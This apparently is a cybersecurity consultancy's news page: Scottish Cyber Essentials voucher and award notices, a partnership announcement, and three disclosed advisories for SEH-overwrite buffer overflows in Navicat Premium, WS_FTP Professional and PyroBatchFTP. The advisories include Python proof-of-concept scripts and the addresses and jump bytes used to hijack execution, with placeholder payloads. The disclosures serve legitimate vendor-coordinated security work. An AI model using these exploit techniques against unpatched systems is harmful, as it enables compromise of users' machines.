Scottish SMEs and Third Sector Organisations Eligible for CE and CE Plus Vouchers

In June of this year, the Scottish Government set out their ongoing commitment to developing the Safe, Secure and Prosperous: A Cyber Resilience Strategy for Scotland. As part of this, they have made £500,000 available under the National Cyber Security Programme for a voucher scheme to support small and medium-sized private and third sector organisations in Scotland. Funding is to enable those organisations to achieve the National Cyber Security Centre (NCSC) endorsed Cyber Essentials or Cyber Essentials Plus certificate.

Organisations can apply for the grant funding online and if approved will be eligible to access the money once they have achieved the Cyber Essentials accreditation. As an independent technical information assurance consultancy, 7 Elements is well placed to support your organisation through the process of gaining Cyber Essentials certification. All of our staff are highly technical and therefore our Cyber Essentials assessors are well qualified to assist you through the process. More information on the Cyber Essentials process can be found here: https://www.7elements.co.uk/services/cyber-essentials/

As of today (7th November 2018), the scheme is live and you can apply for your voucher of up to £1000 to achieve Cyber Essentials certification. The scheme will run for 12 months or until the vouchers have been exhausted.

Scotland based small and medium-sized private sector organisations can apply via a portal on the Scottish Enterprise website below:
https://www.scottish-enterprise.com/

Third sector organisations can apply via a portal on the Scottish Council Voluntary Organisations (SCVO) website below:
https://scvo.org.uk/digital/

Best Customer Experience Award Nomination 2018

We are thrilled to have been nominated for the ‘Best Customer Experience’ award at the 2018 Scottish Cyber Awards!

The Scottish Cyber Awards are back for their third year, and we are delighted to have been nominated for the ‘Best Customer Experience’ award. This nomination means even more to us because all recommendations are from end-users that had directly utilised the services of a Scottish based cyber security organisation, which is a massive honour. We are delighted to be in such good company with Quorum Cyber and Seric Systems.

The customer experience award aims to credit organisations who are dedicated to providing outstanding service. Companies who have gone over and above what is expected to offer excellent service and act as a standard for organisations across the industry to aim for over the coming year (SBRC 2018).

David and his team are customer experience wizards – whenever I need their services, they’re there. Dependable, adaptive, clear and reliable. On all the engagements I’ve worked on with 7 Elements I’ve been impressed by David and his team’s responsiveness and capabilities. Genuine passion for the area rather than being sales driven. This goes a long way with me and I’ll keep going back to them on this basis. – 7 Elements Nomination

The winner of this award will be decided via public vote and we hope that we can rely on yours! Voting closes on the 30th October and you can place your votes here:

https://www.scottishcyberawards.co.uk

The winner will be announced at the awards dinner on the 28th November at the Sheraton Hotel.

ZoneFox Collaboration

We are excited to announce our recent partnership with ZoneFox, to enhance our award winning Incident Response Service.

At 7 Elements we work with clients across the globe, providing expertise in technical information assurance. We use an event-driven approach to Incident Response encompassing five key stages: situational awareness; establishing response parameters; resource deployment; establishing compromise zone and incident classification; followed by incident containment and remediation.

To enhance our situational awareness capability we have partnered with ZoneFox and will be able to deploy the ZoneFox agent as part of our initial response activity.

The ZoneFox solution monitors user behaviour and data movement both on-and-off-network, alerting against malicious or anomalous behaviour. This is achieved through user and entity behaviour analytics (UEBA) and intelligent machine-learning technology that provides 360 visibility across the network and beyond.

Jamie Graves, CEO, ZoneFox said: “Through our work with clients it is becoming increasingly clear that the majority are now using the platform as a cornerstone of their Incident Response strategy. The data and evidence the platform delivers to the business makes it easy to pinpoint vulnerabilities and devise a remediation plan. We’re delighted to be working with 7 Elements and this is definitely an area of the business we will be looking to grow.”

Navicat Premium Oracle Connection Buffer Overflow (SEH overwrite) Vulnerability

Advisory Information

Title: Navicat Premium Oracle Connection Buffer Overflow (SEH overwrite)

Date Published: 01/05/2018

Advisory Summary

Inputting an excessively long string of characters into the ‘host’ field when creating a new Oracle connection causes the program to crash. A lack of address space layout randomisation (ASLR) enabled within the software allows an attacker to reliably hijack the execution flow of the application.

Vendor

PremiumSoft CyberTech Ltd

Affected Software

Product Version
NaviCat Premium <= 12.0.26

Description of Issue

A buffer overflow vulnerability was discovered in NaviCat Premium version 12.0.26. This vulnerability was found in the “New Connection” component of the application. Entering an excessively long string into the host field of a new Oracle connection will cause the program to crash. This crash, combined with a lack of ASLR enabled within the application, allows an attacker to overwrite the structured exception handler (SEH) and hijack execution flow of the application. This issue was tested on a 32-bit Windows 7 host.

PoC

The following proof of concept python script will generate a text file with a string to overwrite SEH. Once the file is generated, copy the contents of navicatPOC.txt and paste into the host field of a new Oracle connection. Test the connection to trigger the crash



#!/usr/bin/python
# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 01/05/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.
 
 
# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow. 
filename="navicatPOC.txt"
junk = "A" * 1502
#nseh = "\x4C\x4C\x77\x04"
#seh= "\x75\x2a\x01\x10"
nseh = "B" * 4
seh = "C" * 4
fill = "D" * 4000
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

This will result an SEH overwrite, as demonstrated by the following screenshot:

SEH Overwrite
 

From here, we can replace SEH with POP POP RET instructions, located at 10012a75:

seh= "\x75\x2a\x01\x10"

And replace nSEH with the following code to jump to our payload:

nseh = "\x4C\x4C\x77\x04"

Which will land at the payload, represented in the proof of concept as the character ‘D’ (\x44).

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of Navicat Professional can be found on the Navicat website.

Timeline

Advisory sent – 4th April 2018

Requested confirmation that advisory has been recieved by Navicat – 9th April 2018

Confirmation of the issue by Navicat – 9th April 2018

Patch released by Navicat – 26th April 2018

Advisory published by 7 Elements – 1st May 2018

CVE-2017-16513 – Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)

Advisory Information

Title: CVE-2017-16513 Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)

Date Published: 03/11/2017

Advisory Summary

The application accepts user input to perform a local search function. Inputting an excessively long string of characters causes the program to crash and for an attacker to gain control of the execution flow of the application. This issue also impacts the “backup location” field.

Vendor

Ipswitch

Affected Software

Product Version
Ipswitch WS_FTP Professional 12.6.03

Description of Issue

A local buffer overflow vulnerability was discovered in Ipswitch WS_FTP Professional version 12.6. This vulnerability was found in the “local search” component of the application. Entering a search string longer than 779 characters will cause the program to crash. It is possible to overwrite the structured exception handler (SEH) after an offset of 840 characters and hijack execution flow of the application. This issue also impacts the “backup location” field and was tested on a 32-bit Windows 7 host.

PoC

The following proof of concept python script will generate a text file with a string to overwrite SEH. Once the file is generated, copy the contents of poc.txt and paste into the local search field to trigger the crash.



#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)
#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#nSEH = "\x74\x08\x90\x90"
#SEH = "\x31\x2D\x91\x23"

buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4


f = open ("poc.txt", "w")
f.write(buffer + nSEH + SEH + "D" * 200)
f.close()

This will result trigger an SEH overwrite, as demonstrated by the following screenshot:

SEH Overwrite
 

From here, we can replace SEH with POP POP RET instructions, located at:

23912D31

And replace nSEH with the following code to jump to our payload:

"\x74\x08\x90\x90"

Which will land at the payload, represented in the proof of concept as the character ‘D’ (\x44).

SEH Overwrite
 

A short video proof-of-concept can be seen below:

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of Ipswitch WS_FTP Professional can be found on the Ipswitch website.

Timeline

Initial request for security contact via vendor website – 20th September 2017

Second request sent to vendor – 4th October 2017

Reponse from security contact, advisory sent – 5th October 2017

Video poc requested by vendor – 10th October 2017

Video poc sent – 10th October 2017

Fix verified by both parties – 20th October 2017

Patch Released – 2nd November 2017

Advisory Released – 3rd November 2017

CVE-2017-15035 PyroBatchFTP Buffer Overflow (SEH Overwrite)

Advisory Information

Title: PyroBatchFTP Buffer Overflow (SEH Overwrite)

Date Published: 04/10/2017

Advisory Summary

It is possible to cause a buffer overflow in PyroBatchFTP when a client connects to an FTP server with an excessively long current directory string.

Vendor

Emtec

Affected Software

Product Version
PyroBatchFTP 3.17

Description of Issue

A buffer overflow vulnerability was discovered in the PyroBatchFTP client version 3.17. This vulnerability occurs after successfully connecting to an FTP server with a current directory string of longer than 2265 characters. It is also possible to overwrite the Structured Exception Handler (SEH) and potentially hijack execution flow of the application.

PoC

The following proof of concept python script will initialise an FTP server on the host system.
Connecting to the FTP server using PyrobatchFTP will trigger the buffer overflow.


#!/usr/bin/python

print "Pyro FTP Buffer Overflow (SEH) Server"

#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk 
#Vendor Website: https://www.emtech.com

import socket 
import sys

buffer="A"*2292+ "B"*4+"C"*4+"D"*800 
port = 21

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
        s.bind(("0.0.0.0", port))
	s.listen(5)
	print("[+] FTP server started on port: "+str(port)+"\r\n")
except: 
	print("[+] Failed to bind the server to port:"+str(port)+"\r\n")
while True:
	conn, addr = s.accept()
	conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n') print(conn.recv(1024))
	conn.send("331 OK\r\n")
	print(conn.recv(1024))
	conn.send('230 OK\r\n')
	print(conn.recv(1024))
	conn.send('220 "'+buffer+'" is current directory\r\n')

SEH Overwrite
 

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of PyroBatchFTP can be found on the EmTec website.

Timeline

Reported – 16th September 2017

Vendor Response – 18th September 2017

Update Requested – 3rd October 2017

Vendor Response and Patch – 4th October 2017

Advisory Published – 4th October 2017